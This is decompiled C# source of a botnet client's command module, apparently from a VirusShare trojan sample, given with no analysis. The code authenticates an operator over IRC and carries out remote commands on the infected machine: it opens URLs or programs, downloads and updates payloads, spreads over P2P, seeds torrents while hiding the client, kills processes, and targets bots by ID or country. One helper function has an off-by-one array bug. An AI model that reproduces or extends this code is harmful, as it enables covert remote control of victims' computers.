// Decompiled with JetBrains decompiler // Type: Hearding_Bot.Functions // Assembly: Hearding Bot, Version=, Culture=neutral, PublicKeyToken=null // MVID: 931E7B23-EA6E-4139-8BD0-1A4E0BF9E258 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Fsysna.dljm-a7abcca3397d1344b43d53c1427609ca1808f1991c5d2b158fd67c1ea3e6f19a.exe using System; using System.Diagnostics; using System.Net.Sockets; using System.Threading; namespace Hearding_Bot { internal class Functions { public static string msg = ""; public static bool runn = false; public static string prox = ""; public static bool loggedIn = false; public static int signum = 0; public static void determineCommand(string cmd) { string[] strArray = new string[2]; if (cmd.Contains(" ")) strArray = cmd.Split(new char[1]{ ' ' }, 2); else strArray[0] = cmd; if (strArray[0].ToString().ToLower() == "login") Functions.login(strArray[1]); if (!Functions.loggedIn) return; switch (strArray[0].ToString().ToLower()) { case "visit": Process.Start(strArray[1]); Irc.WriteTo(Config.ircChannel, strArray[1] + " has been opened!"); break; case "logout": Functions.logout(); break; case "disconnect": Functions.kill(); break; case "reconnect": Functions.recon(); break; case "sort": Irc.Write("JOIN #" + botInfo.countryCode(botInfo.codeType.Short)); break; case "unsort": Irc.Write("PART #" + botInfo.countryCode(botInfo.codeType.Short)); break; case "uninstall": Install.uninstall((string) null); break; case "download": downloadUpdate.downloadThread(strArray[1]); break; case "update": downloadUpdate.updateThread(strArray[1]); break; case "p2p": P2P.p2p(); break; case "seed": if (utSeed.Check()) { try { utSeed.Run(); utSeed.SeedIt(strArray[1]); utSeed.HideIt(); Irc.WriteTo(Config.ircChannel, "[SEED]: Seeding Has Started On " + strArray[1] + "!"); } catch { } } if (utSeed.Check()) break; Irc.WriteTo(Config.ircChannel, "[SEED]: Seeding Could not Begin due to lack of P2P Software!"); break; } } private static void killProc(string procName) { Process process1 = (Process) null; foreach (Process process2 in Process.GetProcesses()) { if (process2.ProcessName.ToLower() == procName.ToLower()) { process1 = process2; break; } } if (process1 != null) { try { process1.Kill(); Irc.WriteTo(Config.ircChannel, "Killed " + procName); } catch (Exception ex) { Irc.WriteTo(Config.ircChannel, "Failed to end process"); } } else Irc.WriteTo(Config.ircChannel, "No such process found"); } public static void kill() { Irc.ircClient = (TcpClient) null; while (true) { Thread.Sleep(15); try { Process.GetCurrentProcess().Kill(); break; } catch (Exception ex) { } } } public static void recon() { Process.Start(Config.installPath + Config.installFile); Functions.kill(); } private static void logout() { Irc.WriteTo(Config.ircChannel, "Logged out."); Functions.loggedIn = false; } private static void login(string cmd) { if (!(cmd == Config.botPassword) || Functions.loggedIn) return; Irc.WriteTo(Config.ircChannel, "Auth Accepted!"); Functions.loggedIn = true; } public static void determineWho(string cmd) { bool flag1 = true; bool flag2 = true; bool flag3 = false; bool flag4 = false; if (cmd.Contains("b{") && cmd.Contains("}")) { flag1 = false; int startIndex = cmd.IndexOf("b{") + 2; int num = cmd.IndexOf('}', startIndex); string str1 = cmd.Substring(startIndex, num - startIndex); if (str1[0] == '!') { flag1 = true; flag4 = true; } cmd = cmd.Replace("b{" + str1 + "} ", ""); if (flag4) str1 = str1.Substring(1); if (str1.Contains(",")) { string str2 = str1; char[] chArray = new char[1]{ ',' }; foreach (string str3 in str2.Split(chArray)) { if (str3.ToLower() == Config.botRandom.ToLower()) { flag3 = true; flag1 = !flag4; break; } } } else if (str1.ToLower() == Config.botRandom.ToLower()) { flag3 = true; flag1 = !flag4; } } if (!flag1) return; bool flag5 = false; if (cmd.Contains("c{") && cmd.Contains("}")) { flag2 = false; int startIndex = cmd.IndexOf("c{") + 2; int num = cmd.IndexOf('}', startIndex); string str4 = cmd.Substring(startIndex, num - startIndex); if (str4[0] == '!') { flag2 = true; flag5 = true; } cmd = cmd.Replace("c{" + str4 + "} ", ""); if (flag5) str4 = str4.Substring(1); if (str4.Contains(",")) { string str5 = str4; char[] chArray = new char[1]{ ',' }; foreach (string str6 in str5.Split(chArray)) { if (str6.ToLower() == botInfo.countryCode(botInfo.codeType.Short).ToLower()) { flag2 = !flag5; break; } } } else if (str4.ToLower() == botInfo.countryCode(botInfo.codeType.Short).ToLower()) flag2 = !flag5; } if ((!flag1 || !flag2) && (!flag1 || !flag3 || flag2)) return; Functions.determineCommand(cmd); } public static byte[] ConvertToByteArray(string[] stringArray) { byte[] byteArray = new byte[stringArray.Length - 1]; for (int index = 0; index <= stringArray.Length - 1; ++index) byteArray[index] = Convert.ToByte(stringArray[index]); return byteArray; } } }